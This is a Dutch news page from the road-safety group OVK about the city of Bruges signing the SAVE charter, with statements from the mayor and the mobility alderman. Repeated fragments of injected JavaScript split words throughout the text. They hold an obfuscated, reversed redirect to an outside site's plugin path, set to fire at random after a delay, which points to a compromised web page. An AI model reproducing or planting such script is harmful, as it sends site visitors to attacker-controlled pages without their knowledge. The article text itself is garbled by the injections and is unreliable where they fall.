Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Brugge ondertekent het SAVE-charter

Op maandag 6 juli ondertekende Brugge als 49e in Vlaanderen het SAVE-charter. Ze zijn daarmee de grootste centrumstad die dat engagement toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot nu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe aangaat. Brugge geeft met de ondertekening van het SAVE-charter duidelijk het signaal zich actief te willen inzetten voor meer verkeersveiligheid.

Burgemeester Renaat Landuyt: “Het is niet meer dan evident dat we ons als Stad Brugge achter dit project scharen. Brugge draagt veiligheid hoog in het vaandel en zet daar sterk op in. Verkeersveiligheid is één van de belangrijke prioriteiten van ons lokaal veiligheids- en preventieplan. Het aantal ongevallen met verkeersdoden in Brugge is in 2014 gedaald in vergelijking met 2013. Het aantal ongevallen met gewonden, zowel zwaar – als lichtgewonden daarentegen is gestegen en dat is geen goed nieuws. Elk verkeersslachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffer, elke verkeersdode is er één te veel. Als Stad hebben we de taak om alle betrokkenen op te roepen om samen te werken aan verkeersveiligheid.”

“Met de ondertekening van het SAVE-charter bevestigen we onze verhoogde aandacht voor verkeersveiligheid. Als stadsbestuur hebben we hierin een bijzondere rol. We willen het voortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touw nemen door maximaal te investeren in een verkeersveiligeomgeving, door samen met de lokale politie te zorgen voor een goede handhaving en ook door preventie en nazorg voldoende aandacht te geven.”

Deze 4 elementen vormen de kern van ons verkeersveiligheidsambities

  • Een goed mobiliteitsplan gebaseerd op het STOP principe
  • een daadkrachtige en slimme inzet van de lokale politie ifv. de handhaving van deze principes
  • Een versterkte preventie met aandacht voor verkeerseducatie van zowel jong als oud
  • Een goede nazorg waar zowel slachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffers, daders en de omgeving aandacht krijgen.”

Schepen van Mobiliteit Annick Lambrecht:

“Met de opmaak van een nieuw mobiliteitsplan wil de stad Brugge een fundamenteel andere invulling geven aan de stad. We willen de verkeerstromen op het hele grondgebied Brugge zo organiseren dat ze in de eerste plaats veilig zijn. Het vermelde STOP principe neemt stappers en trappers voor op het gemotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toriseerde verkeer. Dit betekent dat we sterk zullen inzetten op veilige wandelomgevingen, met o.a. nu al de eerste verkennende experimenten met autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toluwe koopstraten tijdens de solden.”

“De fiets is hét vervoermiddel van de 21ste eeuw en dat willen we ook in Brugge 200% ondersteunen. Brugge is nu al een bijzondere fietsstad, maar dat kan nog veel beter. Het uitgebreide fietsplan Brugge, dat als onderdeel van het mobiliteitsplan al werd goedgekeurd door de gemeenteraad moet onze ambities rond zowel fietscomfort als fietsveiligheid concreet tastbaar maken.

Brugse kinderen en jongeren, die de grootste groep stappers en trappers vormen, zullen de maatstaf zijn van dit mobiliteitsplan. Met de ondertekening van het SAVE-charter reiken we ook de hand naar de ouders van verongelukte kinderen. We zullen hun ideeën en suggesties voor een veiliger verkeer kunnen gebruiken om ons mobiliteitsplan nog sterker te maken.”

 


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be